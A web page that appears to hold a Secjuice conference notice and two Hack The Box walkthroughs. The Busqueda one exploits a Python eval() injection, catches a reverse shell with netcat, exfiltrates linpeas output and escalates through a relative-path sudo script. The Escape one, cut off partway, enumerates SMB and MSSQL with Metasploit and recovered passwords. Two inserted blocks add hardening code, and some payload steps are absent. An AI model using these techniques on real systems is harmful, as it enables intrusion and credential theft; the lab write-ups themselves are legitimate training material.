After a decade of publishing your favorite infosec articles, we are very proud to announce SecjuiceCON 2025, our very first virtual conference. The first Secjuice conference is an online event for infosec and osint industry insiders, and we’d love for you to talk to our audience about your wisdom and learnings.
You might already know about our work, but Secjuice is the only non-profit, independent, and volunteer-led publication in the information security space. We are a private members’ writing club focused on cybersecurity, information security, hacking, and open-source intelligence gathering.
We believe that our value as professionals lies in our ability to share our research and knowledge with others through the written word. We mentor hackers and help them prepare their research for publication. Our members feel a strong sense of civic duty; it’s what drives us to spread our knowledge and experiences with our community. Defending the interests of those who hack is within our remit.
As usual, a nice and simple box with two relatively simple exploits, suitable even for beginners. Let’s go.
The nmap scan:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 15:08 EDT
Nmap scan report for 10.10.11.208
Host is up (0.15s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_ 256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open http Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://searcher.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.86 seconds
Port 80 redirects to the “searcher.htb” domain, so add it to the /etc/hosts file.
It seems to be a search-engine aggregator. Wappalyzer reports Python (3.10.6) and Flask (2.1.2).
The portal is based on version 2.4.0 of an open-source project called Searchor, whose repository is on GitHub.
Intercepting the calls with Burp Suite, I capture the following request:
POST /search HTTP/1.1
Host: searcher.htb
Content-Length: 24
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://searcher.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://searcher.htb/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
engine=Amazon&query=test
Let’s investigate the code in the repository, cross-referencing the eval() mentioned in the vulnerability report with the request sent to the /search route. Download version 2.4.0 of the source code (https://github.com/ArjunSharda/Searchor/releases/tag/v2.4.0).
Search for the method that handles the POST…
def search(engine, query, open, copy):
    try:
        # engine and query are interpolated, unescaped, into Python source text and evaluated
        url = eval(
            f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open})"
        )
        click.echo(url)
        searchor.history.update(engine, query, url)
        if open:
            click.echo("opening browser...")
        if copy:
            click.echo("link copied to clipboard")
    except AttributeError:
        print("engine not recognized")
Apparently, you can run arbitrary Python code; it would be easiest through the last parameter (open). Sniffing the request after ticking the “Auto redirect” option with Burp Suite…
POST /search HTTP/1.1
Host: searcher.htb
Content-Length: 39
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://searcher.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://searcher.htb/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
engine=Amazon&query=test&auto_redirect=
It seems that the backend only checks for the presence of the parameter, so I can’t take advantage of the “auto_redirect” parameter; I’ll have to use the “query” parameter instead. The goal is to pass a value such that an additional command is executed alongside the original one. Starting from how the original string is constructed, we have to close the string literal at the point where the query parameter is inserted. Just pass the following as the query value:
test')#
This will terminate the string with the single quote, close the search command with the closing parenthesis, and comment out everything that follows.
Since the search method of the Engine class accepts the remaining parameters with default values, there will be no problem: in this case the search method is invoked with only the first parameter.
def search(self, query, open_web=False, copy_url=False, additional_queries: dict = None):
    url = self.value.format(query=quote(query, safe=""))
    if additional_queries:
        url += ("?" if "?" not in self.value.split("/")[-1] else "&") + "&".join(
            query + "=" + quote(query_val)
            for query, query_val in additional_queries.items()
        )
    if open_web is True:
        open_new_tab(url)
    if copy_url is True:
        pyperclip.copy(url)
    return url
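To make the root cause concrete, here is an added example (not Searchor’s code and not part of the original write-up) that models the Engine enum with two URL templates and places the page’s eval-based dispatch beside a hardened version that looks the engine up by name from an allow-list and passes the query as a plain argument. The Amazon and `test')#` values are the ones from the write-up; the Google template and the function names search_with_eval and search_safe are assumptions.

```python
from enum import Enum
from urllib.parse import quote


class Engine(Enum):
    """Stripped-down stand-in for Searchor's Engine enum (constructed here);
    as in the real project, the member value is the URL template."""
    Amazon = "https://www.amazon.com/s?k={query}"
    Google = "https://www.google.com/search?q={query}"  # assumed template

    def search(self, query, open_web=False, copy_url=False):
        # Same shape as the page's Engine.search: percent-encode the query and
        # drop it into the template (browser/clipboard side effects omitted).
        return self.value.format(query=quote(query, safe=""))


def search_with_eval(engine: str, query: str, open_web=False, copy_url=False) -> str:
    """The vulnerable pattern from the write-up: user input is spliced into
    Python source text and evaluated, so a quote inside `query` ends the
    string literal and a `#` comments out the rest of the expression."""
    return eval(
        f"Engine.{engine}.search('{query}', copy_url={copy_url}, open_web={open_web})"
    )


def search_safe(engine: str, query: str, open_web=False, copy_url=False) -> str:
    """Hardened dispatch: the engine name is an allow-listed enum lookup and
    the query is passed as a value, never as source code."""
    try:
        member = Engine[engine]
    except KeyError:
        raise ValueError(f"engine not recognized: {engine!r}")
    return member.search(query, open_web=open_web, copy_url=copy_url)


if __name__ == "__main__":
    payload = "test')#"  # the closing-quote payload shown in the write-up
    # With eval, ')# is parsed as syntax: the query silently becomes just "test".
    print(search_with_eval("Amazon", payload))
    # With the lookup, ')# stays data and is percent-encoded into the URL.
    print(search_safe("Amazon", payload))
```

The observable difference is the tell a code reviewer should look for: in the eval version the characters after the closing quote vanish from the URL because they were treated as Python, while in the hardened version they survive, percent-encoded, because they were only ever treated as data.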
Now I have to inject the code I want to execute. Since I can’t concatenate another string, I take advantage of a trick that lets me execute code through a string’s format method: the search method of the Engine class still returns a string, on which I can call format. Since the returned URL contains no placeholders, the format has no effect on it, but the expression passed to it is still evaluated. As usual, to test, I run a curl back to my listening machine to see whether the injection was successful. The query parameter then looks something like this:
┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox]
└─$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.151] from searcher.htb [10.10.11.208] 37746
/bin/sh: 0: can't access tty; job control turned off
$ whoami
svc
Navigate to the home folder and discover that this is the user who holds the flag.
$ cat user.txt
f******************************2
I spawned a tty shell to test the sudo command, but this user cannot run sudo without a password. So, launch linpeas as usual, without leaving any trace.
Download linpeas and start PHP’s built-in web server.
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.208 - Busqueda (lin)/attack/upld]
└─$ wget https://github.com/carlospolop/PEASS-ng/releases/download/20230425-bd7331ea/linpeas.sh
--2023-05-01 15:22:07-- https://github.com/carlospolop/PEASS-ng/releases/download/20230425-bd7331ea/linpeas.sh
Resolving github.com (github.com)... 140.82.121.3
Connecting to github.com (github.com)|140.82.121.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/ba2c0404-93e2-44d5-a884-e5c0a3af4a1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230501%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230501T192141Z&X-Amz-Expires=300&X-Amz-Signature=f1406d9bc0d84625cf1e57d0cbff85ba838dd4afbda36a5a4beee2260e83a21d&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream [following]
--2023-05-01 15:22:08-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/ba2c0404-93e2-44d5-a884-e5c0a3af4a1a?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20230501%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230501T192141Z&X-Amz-Expires=300&X-Amz-Signature=f1406d9bc0d84625cf1e57d0cbff85ba838dd4afbda36a5a4beee2260e83a21d&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=165548191&response-content-disposition=attachment%3B%20filename%3Dlinpeas.sh&response-content-type=application%2Foctet-stream
Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 830030 (811K) [application/octet-stream]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[=============================================================================================================>] 810.58K --.-KB/s in 0.1s
2023-05-01 15:22:09 (5.56 MB/s) - ‘linpeas.sh’ saved [830030/830030]
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.208 - Busqueda (lin)/attack/upld]
└─$ php -S 10.10.14.151:80
[Mon May 1 15:22:12 2023] PHP 8.2.4 Development Server (http://10.10.14.151:80) started
Then start the netcat listener that will receive the scan output.
nc -lp 4445 | tee lpeasout.file
And finally, launch the attack on the remote machine.
Let the scan complete (check your netcat session).
linpeas output, interesting points:
[...]
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Dec 22 18:44 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Dec 22 18:44 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Dec 1 18:45 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf
<VirtualHost *:80>
ProxyPreserveHost On
ServerName searcher.htb
ServerAdmin admin@searcher.htb
ProxyPass / http://127.0.0.1:5000/
ProxyPassReverse / http://127.0.0.1:5000/
RewriteEngine On
RewriteCond %{HTTP_HOST} !^searcher.htb$
RewriteRule /.* http://searcher.htb/ [R]
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
<VirtualHost *:80>
ProxyPreserveHost On
ServerName gitea.searcher.htb
ServerAdmin admin@searcher.htb
ProxyPass / http://127.0.0.1:3000/
ProxyPassReverse / http://127.0.0.1:3000/
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
[...]
-rw-rw-r-- 1 svc svc 76 Apr 3 08:58 /home/svc/.gitconfig
[user]
email = cody@searcher.htb
name = cody
[core]
hooksPath = no-hooks
[...]
╔══════════╣ Checking if containerd(ctr) is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it
ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"
╔══════════╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation
runc was found in /usr/sbin/runc, you may be able to escalate privileges with it
╔══════════╣ Searching docker files (limit 70)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation
lrwxrwxrwx 1 root root 33 Dec 21 19:13 /etc/systemd/system/sockets.target.wants/docker.socket -> /lib/systemd/system/docker.socket
-rw-r--r-- 1 root root 175 Jan 3 18:47 /usr/lib/systemd/system/docker.socket
-rw-r--r-- 1 root root 477 Jun 15 2022 /usr/local/lib/node_modules/pm2/node_modules/@pm2/io/docker-compose.yml
-rw-r--r-- 1 root root 0 Dec 21 19:13 /var/lib/systemd/deb-systemd-helper-enabled/sockets.target.wants/docker.socket
[...]
Found an additional domain (gitea.searcher.htb); add it to the /etc/hosts file and browse to it.
Gitea Version: 1.18.0+rc1
Searching for an exploit, I find something (even an RCE), but it requires being authenticated. After some more searching I can’t find anything of interest, so, convinced that the next clue has something to do with git anyway, I search the repositories available on this box.
After searching the repository a bit, without much success, and not knowing exactly how to proceed, I start searching online and come across an interesting article.
It seems I have found what I was looking for and can finally access the Gitea portal. So, I can go back to one of the previous exploits that need credentials.
Unfortunately, I can’t even create a new repository. Anyway, I can connect via SSH using the password.
$ sudo -l
sudo -l
[sudo] password for svc: jh1usoih2bkjaspwe92
Matching Defaults entries for svc on busqueda:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin,
use_pty
User svc may run the following commands on busqueda:
(root) /usr/bin/python3 /opt/scripts/system-checkup.py *
$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
sudo /usr/bin/python3 /opt/scripts/system-checkup.py *
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)
docker-ps : List running docker containers
docker-inspect : Inpect a certain docker container
full-checkup : Run a full system checkup
$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
960873171e2e gitea/gitea:latest "/usr/bin/entrypoint…" 4 months ago Up 8 hours 127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp gitea
f84a6b33fb5a mysql:8 "docker-entrypoint.s…" 4 months ago Up 8 hours 127.0.0.1:3306->3306/tcp, 33060/tcp mysql_db
$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect
Usage: /opt/scripts/system-checkup.py docker-inspect <format> <container_name>
$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
Something went wrong
I’ll probably have to use the docker command to elevate privileges, but in the meantime let’s collect as much information as possible about the running containers as well.
The passwords don’t seem useful in any case. Since the script appeared to use the docker command anyway, I tried hard to exploit that, passing additional arguments and injecting alternative commands, but without success. Then I took a look at the folder where the script is located and found a couple of interesting clues.
-bash-5.1$ ls -la /opt/scripts/
total 28
drwxr-xr-x 3 root root 4096 Dec 24 18:23 .
drwxr-xr-x 4 root root 4096 Mar 1 10:46 ..
-rwx--x--x 1 root root 586 Dec 24 21:23 check-ports.py
-rwx--x--x 1 root root 857 Dec 24 21:23 full-checkup.sh
drwxr-x--- 8 root root 4096 Apr 3 15:04 .git
-rwx--x--x 1 root root 3346 Dec 24 21:23 install-flask.sh
-rwx--x--x 1 root root 1903 Dec 24 21:23 system-checkup.py
Inside the folder there is a script named after the third action accepted by the original script (full-checkup.sh), and there appears to be a git repository. However, I don’t have permission to read the files inside it, but let’s try to proceed along this new path.
-bash-5.1$ git status
fatal: not a git repository (or any of the parent directories): .git
-bash-5.1$ ls -la .git
ls: cannot open directory '.git': Permission denied
The git repository route has to be abandoned; the script file remains.
-bash-5.1$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup
[=] Docker conteainers
{
"/gitea": "running"
}
{
"/mysql_db": "running"
}
[=] Docker port mappings
{
"22/tcp": [
{
"HostIp": "127.0.0.1",
"HostPort": "222"
}
],
"3000/tcp": [
{
"HostIp": "127.0.0.1",
"HostPort": "3000"
}
]
}
[=] Apache webhosts
[+] searcher.htb is up
[+] gitea.searcher.htb is up
[=] PM2 processes
┌─────┬────────┬─────────────┬─────────┬─────────┬──────────┬────────┬──────┬───────────┬──────────┬──────────┬──────────┬──────────┐
│ id │ name │ namespace │ version │ mode │ pid │ uptime │ ↺ │ status │ cpu │ mem │ user │ watching │
├─────┼────────┼─────────────┼─────────┼─────────┼──────────┼────────┼──────┼───────────┼──────────┼──────────┼──────────┼──────────┤
│ 0 │ app │ default │ N/A │ fork │ 1655 │ 28h │ 0 │ online │ 0% │ 31.0mb │ svc │ disabled │
└─────┴────────┴─────────────┴─────────┴─────────┴──────────┴────────┴──────┴───────────┴──────────┴──────────┴──────────┴──────────┘
[+] Done!
Oh oh… the command that didn’t work before now executes correctly, so the script runs a helper with that name from the folder you are currently in, rather than from a fixed location!
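The lesson for anyone writing a sudo-runnable maintenance script is to resolve helpers against the script’s own directory and verify them before executing them. The following is an added example, not the box’s system-checkup.py (whose source the write-up does not show): it assumes the helper was invoked as ./full-checkup.sh relative to the caller’s working directory, contrasts that with a lookup pinned to the script directory, and adds an ownership and write-permission check before execution. The scratch directory, the helper file and the function names are constructed for the example.

```python
import os
import stat
import subprocess
import tempfile
from pathlib import Path


def helper_path_relative(cwd: Path, name: str) -> Path:
    """Unsafe resolution (assumed to match the box): "./name" is looked up in
    the caller's current directory, so whoever controls the cwd controls
    which file the privileged script runs."""
    return cwd / name


def helper_path_pinned(script_dir: Path, name: str) -> Path:
    """Safe resolution: the helper lives next to the privileged script
    (in real code script_dir would be Path(__file__).resolve().parent)."""
    return (script_dir / name).resolve()


def helper_is_trusted(path, expected_uid: int = 0) -> bool:
    """Refuse a helper unless it is a regular file (no symlinks), owned by the
    expected uid (root for a script run via sudo) and not group/world writable."""
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return False
    if not stat.S_ISREG(st.st_mode):
        return False
    if st.st_uid != expected_uid:
        return False
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        return False
    return True


def run_checkup(script_dir: Path, name: str, expected_uid: int = 0,
                dry_run: bool = False) -> list:
    """Build the command the privileged script would execute, validate it, and
    only then run it with a fixed cwd and a minimal environment."""
    path = helper_path_pinned(script_dir, name)
    if not helper_is_trusted(path, expected_uid):
        raise PermissionError(f"refusing to execute untrusted helper {path}")
    argv = [str(path)]
    if not dry_run:
        subprocess.run(argv, check=True, cwd="/",
                       env={"PATH": "/usr/sbin:/usr/bin:/sbin:/bin"})
    return argv


def demo() -> dict:
    """Constructed scenario: a scratch directory standing in for /opt/scripts,
    owned by the current user (so expected_uid is os.getuid(), not 0)."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        script_dir = Path(tmp)
        helper = script_dir / "full-checkup.sh"
        helper.write_text("#!/bin/sh\necho '[+] Done!'\n")
        helper.chmod(0o755)
        uid = os.getuid()

        # 1. relative lookup follows the caller's cwd (the flaw the write-up found)
        results["relative"] = str(helper_path_relative(Path("/home/svc"), "full-checkup.sh"))
        # 2. pinned lookup ignores the cwd entirely
        results["pinned"] = str(helper_path_pinned(script_dir, "full-checkup.sh"))
        # 3. a correctly owned, non-writable helper passes the trust check
        results["ok"] = run_checkup(script_dir, "full-checkup.sh", expected_uid=uid, dry_run=True)
        # 4. a group/world-writable helper is refused
        helper.chmod(0o777)
        try:
            run_checkup(script_dir, "full-checkup.sh", expected_uid=uid, dry_run=True)
            results["writable_refused"] = False
        except PermissionError:
            results["writable_refused"] = True
        # 5. a helper owned by someone other than the expected uid is refused
        helper.chmod(0o755)
        results["wrong_owner_refused"] = not helper_is_trusted(helper, expected_uid=uid + 1)
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The pinned lookup removes the cwd from the decision, and the trust check closes the remaining hole in which an attacker can write the helper itself; both are cheap to add to any script that sudoers exposes with a wildcard argument like the one in this box.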
A very particular Windows machine, on which I got stuck, stubbornly looking for an exploit that later turned out to be a simple clue left in plain sight, allowing a very trivial privesc. More challenging, but almost standard, the second privesc, which then led me to the desired root flag.
Let’s start with the nmap scan.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 17:03 EDT
Nmap scan report for 10.10.11.202
Host is up (0.11s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-03-13 05:03:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-13T05:04:25+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-03-11T20:10:28
|_Not valid after: 2053-03-11T20:10:28
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-13T05:04:25+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h59m17s, deviation: 0s, median: 7h59m17s
| smb2-time:
| date: 2023-03-13T05:03:45
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.41 seconds
As usual, there are an infinite number of ports open on a Windows machine and, not content with that, let’s also take a look at the UDP ports.
┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox]
└─$ sudo nmap -sU 10.10.11.202
[sudo] password for in7rud3r:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 17:13 EDT
Nmap scan report for 10.10.11.202
Host is up (0.11s latency).
Not shown: 998 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
123/udp open ntp
Nmap done: 1 IP address (1 host up) scanned in 290.76 seconds
Not much, thank goodness! OK, let’s analyze one port at a time!
Nothing on this set of ports, unless I’ve missed something.
139, 445 – SMB
The enum4linux tool doesn’t enumerate anything in particular, so let’s try a manual approach. I’m able to connect using the rpcclient tool (rpcclient -U “” -N 10.10.11.202), but investigating this would take too much time; I’ll mark it as an activity to come back to if I can’t find anything else, and move on.
┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox/_10.10.11.202 - Escape (win)]
└─$ smbclient -L //10.10.11.202
Password for [WORKGROUP\in7rud3r]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
The Samba client shows, among the classic Windows shares, a “Public” folder that could be interesting; let’s take a look.
┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox/_10.10.11.202 - Escape (win)]
└─$ smbclient --no-pass \\10.10.11.202\Public
Try "help" to get a list of possible commands.
smb: > dir
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1428481 blocks available
smb: > get "SQL Server Procedures.pdf"
getting file SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (10.3 KiloBytes/sec) (average 10.3 KiloBytes/sec)
Take a look at the PDF file.
Well, a good domain to add to my /etc/hosts; go ahead.
389 (636, 3268, 3269) – LDAP
As for LDAP, I tried to navigate the structure using phpLDAPAdmin as usual, but without success.
1433 – SQL Server
And for the uninitiated, port 1433 is the one reserved for SQL Server. There will be a lot of work here; let’s get to it.
The Metasploit Framework is full of attacks for SQL Server… and I think I’ve tried a lot of them.
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > use admin/mssql/mssql_enum
msf6 auxiliary(admin/mssql/mssql_enum) > options
Module options (auxiliary/admin/mssql/mssql_enum):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1433 yes The target port (TCP)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/mssql/mssql_enum) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_enum) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum) > exploit
[*] Running module against 10.10.11.202
[*] 10.10.11.202:1433 - Running MS SQL Server Enumeration...
[*] 10.10.11.202:1433 - Version:
[*] Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
[*] Sep 24 2019 13:48:23
[*] Copyright (C) 2019 Microsoft Corporation
[*] Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
[*] 10.10.11.202:1433 - Configuration Parameters:
[*] 10.10.11.202:1433 - C2 Audit Mode is Not Enabled
[...]
[*] 10.10.11.202:1433 - sp_getbindtoken
[*] 10.10.11.202:1433 - sp_replincrementlsn
[*] 10.10.11.202:1433 - Instances found on this server:
[*] 10.10.11.202:1433 - Default Server Instance SQL Server Service is running under the privilege of:
[*] 10.10.11.202:1433 - xp_regread might be disabled in this system
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mssql/mssql_enum) > use admin/mssql/mssql_enum_domain_accounts
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > options
Module options (auxiliary/admin/mssql/mssql_enum_domain_accounts):
Name Current Setting Required Description
---- --------------- -------- -----------
FuzzNum 10000 yes Number of principal_ids to fuzz.
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1433 yes The target port (TCP)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > exploit
[*] Running module against 10.10.11.202
[*] 10.10.11.202:1433 - Attempting to connect to the database server at 10.10.11.202:1433 as PublicUser...
[+] 10.10.11.202:1433 - Connected.
[*] 10.10.11.202:1433 - SQL Server Name: DC
[...]
[+] 10.10.11.202:1433 - 31 user accounts, groups, and computer accounts were found.
[*] 10.10.11.202:1433 - Query results have been saved to: /home/in7rud3r/.msf4/loot/20230313173523_default_10.10.11.202_mssql.domain.acc_775956.txt
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > use admin/mssql/mssql_enum_sql_logins
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > options
Module options (auxiliary/admin/mssql/mssql_enum_sql_logins):
Name Current Setting Required Description
---- --------------- -------- -----------
FuzzNum 300 yes Number of principal_ids to fuzz.
PASSWORD no The password for the specified username
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 1433 yes The target port (TCP)
TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption"
USERNAME sa no The username to authenticate as
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set)
View the full module info with the info, or info -d command.
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
